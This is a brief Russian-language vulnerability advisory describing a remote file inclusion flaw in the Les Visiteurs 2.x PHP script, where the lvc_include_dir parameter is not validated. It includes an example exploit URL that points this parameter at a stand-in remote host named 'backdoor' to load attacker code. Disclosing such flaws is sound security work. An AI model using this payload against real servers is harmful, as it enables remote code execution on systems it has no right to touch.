Программа: Les Visiteurs 2.x 

Уязвимость обнаружена в Les Visiteurs. Злонамеренный пользователь может получить доступ к системе.
Сценарии "include/new-visitor.inc.php" и "include/config.inc.php" не проверяют фактическое расположение сценариев lang/ .inc.php и db/db_mysql.inc.php, представленных а параметре lvc_include_dir. 

Пример/Эксплоит:

http://host/path/include/config.inc.php ?lvc_include_dir=http://backdoor/

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии